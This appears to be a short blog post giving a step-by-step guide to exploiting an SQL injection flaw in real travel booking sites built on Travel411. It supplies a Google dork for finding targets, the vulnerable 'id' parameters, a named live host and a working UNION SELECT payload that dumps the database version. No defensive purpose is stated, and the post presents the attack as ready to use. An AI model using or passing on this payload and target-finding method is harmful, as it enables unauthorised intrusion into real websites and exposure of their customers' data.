SQL Injection Vulnerability Found in www.travel411.com: Live example
Let me make it more simple.
Step 1: Open google.com
Step 2: Tpye intext:"Powered by Travel411.com"
Step 3: From the search result, find any link looks like info.php?id= or reservations.php?id=
Step 4: Open that link. I found below link:
www.hotels.net411.com/info.php?id=00012
Step 5: Replace 00012 from link and copy paste
-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--
and press enter. BOOOMM..Site is vulnerable to SQLi attack.
0 Visitor Reactions & Comments:
Post a Comment